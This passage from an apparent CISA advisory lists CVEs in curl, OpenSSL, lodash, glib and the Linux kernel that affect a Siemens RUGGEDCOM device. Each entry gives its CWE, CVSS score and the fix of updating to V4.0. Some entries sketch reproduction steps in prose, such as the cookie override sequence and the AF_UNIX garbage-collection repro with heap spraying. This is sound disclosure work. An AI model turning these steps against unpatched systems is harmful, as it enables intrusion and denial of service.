<p>1. A cookie is set using the `secure` keyword for `https://target` 2. curl is redirected to or otherwise made to speak with `http://target` (same hostname, but using clear text HTTP) using the same cookie set 3. The same cookie name is set - but with just a slash as path (`path=\"/\",`). Since this site is not secure, the cookie *should* just be ignored. 4. A bug in the path comparison logic makes curl read outside a heap buffer boundary The bug either causes a crash or it potentially makes the comparison come to the wrong conclusion and lets the clear-text site override the contents of the secure cookie, contrary to expectations and depending on the memory contents immediately following the single-byte allocation that holds the path. The presumed and correct behavior would be to plainly ignore the second set of the cookie since it was already set as secure on a secure host so overriding it on an insecure host should not be okay.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9086">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9230</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9230">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9231</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker.. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/385.html">CWE-385 Covert Timing Channel</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9232</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9232">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-10966</a></h3>
<div class="csaf-accordion-content">
<p>curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl from detecting MITM attackers and more.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-10966">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13465</a></h3>
<div class="csaf-accordion-content">
<p>Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched on 4.17.23</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13465">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1321.html">CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13601</a></h3>
<div class="csaf-accordion-content">
<p>A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13601">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39913</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-&gt;cork. syzbot reported the splat below. [0] The repro does the following: 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes) 2. Attach the prog to a SOCKMAP 3. Add a socket to the SOCKMAP 4. Activate fault injection 5. Send data less than cork_bytes At 5., the data is carried over to the next sendmsg() as it is smaller than the cork_bytes specified by bpf_msg_cork_bytes(). Then, tcp_bpf_send_verdict() tries to allocate psock-&gt;cork to hold the data, but this fails silently due to fault injection + __GFP_NOWARN. If the allocation fails, we need to revert the sk-&gt;sk_forward_alloc change done by sk_msg_alloc(). Let's call sk_msg_free() when tcp_bpf_send_verdict fails to allocate psock-&gt;cork. The "*copied" also needs to be updated such that a proper error can be returned to the caller, sendmsg. It fails to allocate psock-&gt;cork. Nothing has been corked so far, so this patch simply sets "*copied" to 0. [0]: WARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983 Modules linked in: CPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 RIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156 Code: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 &lt;0f&gt; 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc RSP: 0018:ffffc90000a08b48 EFLAGS: 00010246 RAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80 RDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000 RBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4 R10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380 R13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872 FS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0 Call Trace: __sk_destruct+0x86/0x660 net/core/sock.c:2339 rcu_do_batch kernel/rcu/tree.c:2605 [inline] rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861 handle_softirqs+0x286/0x870 kernel/softirq.c:579 __do_softirq kernel/softirq.c:613 [inline] invoke_softirq kernel/softirq.c:453 [inline] __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680 irq_exit_rcu+0x9/0x30 kernel/softirq.c:696 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline] sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39913">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40214</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: af_unix: Initialise scc_index in unix_add_edge(). Quang Le reported that the AF_UNIX GC could garbage-collect a receive queue of an alive in-flight socket, with a nice repro. The repro consists of three stages. 1) 1-a. Create a single cyclic reference with many sockets 1-b. close() all sockets 1-c. Trigger GC 2) 2-a. Pass sk-A to an embryo sk-B 2-b. Pass sk-X to sk-X 2-c. Trigger GC 3) 3-a. accept() the embryo sk-B 3-b. Pass sk-B to sk-C 3-c. close() the in-flight sk-A 3-d. Trigger GC As of 2-c, sk-A and sk-X are linked to unix_unvisited_vertices, and unix_walk_scc() groups them into two different SCCs: unix_sk(sk-A)-&gt;vertex-&gt;scc_index = 2 (UNIX_VERTEX_INDEX_START) unix_sk(sk-X)-&gt;vertex-&gt;scc_index = 3 Once GC completes, unix_graph_grouped is set to true. Also, unix_graph_maybe_cyclic is set to true due to sk-X's cyclic self-reference, which makes close() trigger GC. At 3-b, unix_add_edge() allocates unix_sk(sk-B)-&gt;vertex and links it to unix_unvisited_vertices. unix_update_graph() is called at 3-a. and 3-b., but neither unix_graph_grouped nor unix_graph_maybe_cyclic is changed because both sk-B's listener and sk-C are not in-flight. 3-c decrements sk-A's file refcnt to 1. Since unix_graph_grouped is true at 3-d, unix_walk_scc_fast() is finally called and iterates 3 sockets sk-A, sk-B, and sk-X: sk-A -&gt; sk-B (-&gt; sk-C) sk-X -&gt; sk-X This is totally fine. All of them are not yet close()d and should be grouped into different SCCs. However, unix_vertex_dead() misjudges that sk-A and sk-B are in the same SCC and sk-A is dead. unix_sk(sk-A)-&gt;scc_index == unix_sk(sk-B)-&gt;scc_index &lt;-- Wrong! &amp;&amp; sk-A's file refcnt == unix_sk(sk-A)-&gt;vertex-&gt;out_degree ^-- 1 in-flight count for sk-B -&gt; sk-A is dead !? The problem is that unix_add_edge() does not initialise scc_index. Stage 1) is used for heap spraying, making a newly allocated vertex have vertex-&gt;scc_index == 2 (UNIX_VERTEX_INDEX_START) set by unix_walk_scc() at 1-c. Let's track the max SCC index from the previous unix_walk_scc() call and assign the max + 1 to a new vertex's scc_index. This way, we can continue to avoid Tarjan's algorithm while preventing misjudgments.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40214">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40248</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: vsock: Ignore signal/timeout on connect() if already established During connect(), acting on a signal/timeout by disconnecting an already established socket leads to several issues: 1. connect() invoking vsock_transport_cancel_pkt() -&gt; virtio_transport_purge_skbs() may race with sendmsg() invoking virtio_transport_get_credit(). This results in a permanently elevated `vvs-&gt;bytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling. 2. connect() resetting a connected socket's state may race with socket being placed in a sockmap. A disconnected socket remaining in a sockmap breaks sockmap's assumptions. And gives rise to WARNs. 3. connect() transitioning SS_CONNECTED -&gt; SS_UNCONNECTED allows for a transport change/drop after TCP_ESTABLISHED. Which poses a problem for any simultaneous sendmsg() or connect() and may result in a use-after-free/null-ptr-deref. Do not disconnect socket on signal/timeout. Keep the logic for unconnected sockets: they don't linger, can't be placed in a sockmap, are rejected by sendmsg().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40248">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40250</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Clean up only new IRQ glue on request_irq() failure The mlx5_irq_alloc() function can inadvertently free the entire rmap and end up in a crash[1] when the other threads tries to access this, when request_irq() fails due to exhausted IRQ vectors. This commit modifies the cleanup to remove only the specific IRQ mapping that was just added. This prevents removal of other valid mappings and ensures precise cleanup of the failed IRQ allocation's associated glue object. Note: This error is observed when both fwctl and rds configs are enabled. [1] mlx5_core 0000:05:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:06:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 general protection fault, probably for non-canonical address 0xe277a58fde16f291: 0000 [#1] SMP NOPTI RIP: 0010:free_irq_cpu_rmap+0x23/0x7d Call Trace: ? show_trace_log_lvl+0x1d6/0x2f9 ? show_trace_log_lvl+0x1d6/0x2f9 ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] ? __die_body.cold+0x8/0xa ? die_addr+0x39/0x53 ? exc_general_protection+0x1c4/0x3e9 ? dev_vprintk_emit+0x5f/0x90 ? asm_exc_general_protection+0x22/0x27 ? free_irq_cpu_rmap+0x23/0x7d mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] irq_pool_request_vector+0x7d/0x90 [mlx5_core] mlx5_irq_request+0x2e/0xe0 [mlx5_core] mlx5_irq_request_vector+0xad/0xf7 [mlx5_core] comp_irq_request_pci+0x64/0xf0 [mlx5_core] create_comp_eq+0x71/0x385 [mlx5_core] ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core] mlx5_comp_eqn_get+0x72/0x90 [mlx5_core] ? xas_load+0x8/0x91 mlx5_comp_irqn_get+0x40/0x90 [mlx5_core] mlx5e_open_channel+0x7d/0x3c7 [mlx5_core] mlx5e_open_channels+0xad/0x250 [mlx5_core] mlx5e_open_locked+0x3e/0x110 [mlx5_core] mlx5e_open+0x23/0x70 [mlx5_core] __dev_open+0xf1/0x1a5 __dev_change_flags+0x1e1/0x249 dev_change_flags+0x21/0x5c do_setlink+0x28b/0xcc4 ? __nla_parse+0x22/0x3d ? inet6_validate_link_af+0x6b/0x108 ? cpumask_next+0x1f/0x35 ? 